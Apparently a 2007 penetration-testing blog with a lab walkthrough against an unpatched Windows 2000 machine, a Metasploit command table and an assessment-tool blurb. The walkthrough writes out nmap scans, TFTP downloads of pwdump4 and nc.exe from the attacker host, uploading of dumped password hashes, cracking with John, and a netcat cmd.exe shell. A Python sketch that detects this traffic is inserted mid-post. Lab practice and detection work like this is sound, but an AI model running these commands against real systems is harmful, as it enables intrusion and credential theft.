Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, I'll set up Windows 2000 SP4 and Red Hat Linux 6.2.

This old version of Linux can be downloaded at:

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack, which is already installed on my hard disk, for attacking purposes.
By default, Windows 2000 SP4 is vulnerable to the lsass exploit, so make sure you patch your machine accordingly. In this lab, I won't patch it, in order to show how the attack can be done.

Windows 2000 SP4 - 10.21.11.81
Backtrack (attacker) - 10.21.11.84

On Backtrack, scan the Windows 2000 SP4 machine using nmap:

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81



cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

Exploit the machine and get the shell.

From the Windows 2000 machine, run:

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe


pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt


From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami


That's it, and GAME OVER.
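Seen from the defender's side, the lab above leaves three network traces: a burst of TCP connection attempts across many ports, a server starting TFTP sessions, and an established session on a port the server never exposed before. The detection sketch below is an added example, not part of the original post; the flow-record layout, the port baseline and the scan threshold are assumptions, and the records are constructed rather than captured.

```python
from collections import defaultdict

SERVER, ATTACKER = "10.21.11.81", "10.21.11.84"   # lab addresses from the post
BASELINE = {23, 25, 80}        # assumption: the only services the server should expose
SCAN_PORTS, SCAN_WINDOW = 15, 60   # assumption: 15+ distinct ports in 60 s is a scan

def constructed_flows():
    """Constructed records (ts, proto, src, dst, dport, state), not captured traffic.
    state is "est" when the peer answered and "rej" when it refused."""
    # TCP connect scan: most ports refuse, the open ones complete.
    flows = [(100 + p // 10, "tcp", ATTACKER, SERVER, p,
              "est" if p in BASELINE else "rej") for p in range(20, 60)]
    flows += [
        (300, "udp", SERVER, ATTACKER, 69, "est"),    # server pulls a file over TFTP
        (301, "udp", SERVER, ATTACKER, 69, "est"),
        (360, "udp", SERVER, ATTACKER, 69, "est"),    # server pushes a file out
        (400, "tcp", ATTACKER, SERVER, 2111, "est"),  # connection to a new listener
        (500, "tcp", "10.21.11.50", SERVER, 80, "est"),  # ordinary web client
    ]
    return flows

def detect(flows, servers, baseline):
    """Return {(rule, src, dst): first_seen_ts} for the three behaviours in the lab."""
    alerts = {}
    attempts = defaultdict(list)   # (src, dst) -> [(ts, dport)] of TCP attempts
    for ts, proto, src, dst, dport, state in sorted(flows):
        # Servers rarely have a reason to start TFTP sessions (UDP/69) themselves.
        if proto == "udp" and dport == 69 and src in servers:
            alerts.setdefault(("tftp-from-server", src, dst), ts)
        if proto == "tcp" and dst in servers:
            attempts[(src, dst)].append((ts, dport))
            recent = {p for t, p in attempts[(src, dst)] if ts - t <= SCAN_WINDOW}
            if len(recent) >= SCAN_PORTS:
                alerts.setdefault(("port-scan", src, dst), ts)
            # An established session on a port outside the baseline means a new listener.
            if state == "est" and dport not in baseline:
                alerts.setdefault(("unexpected-listener", src, dst), ts)
    return alerts

if __name__ == "__main__":
    for (rule, src, dst), ts in detect(constructed_flows(), {SERVER}, BASELINE).items():
        print(f"{ts:>4}  {rule:<20} {src} -> {dst}")
```

Blocking outbound UDP/69 from servers and alerting on any listener outside the baseline would each break a step of the lab even on an unpatched host.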

Wednesday, June 13, 2007

Metasploit: 3.0-beta-dev Guide

Basic format for Metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address & port number
3. Pick the payload
4. Configure the payload with local IP address & port number
5. Check / Execute the exploit

Step | Command                    | Description
1    | show exploits              | List all exploits
2    | use [exploit name]         | Choose
3    | show payloads              | To check all available payloads
4    | set PAYLOAD [payload name] | Set the payload
5    | show options               | To check more options that can be set
6    | check                      | To check whether the host is exploitable or not
7    | exploit                    | Exploit the host

Sunday, June 3, 2007

Network-based Application Vulnerability Assessment

AppDetective(TM) – Application Security, Inc's (AppSecInc) network-based application vulnerability assessment solution that arms you with the tools needed to secure applications/databases against unauthorized external attacks, unauthorized internal access, password cracking, and various other attacks before they occur.

https://www.appsecinc.com/cgi-bin/download.pl?download=AppDetective
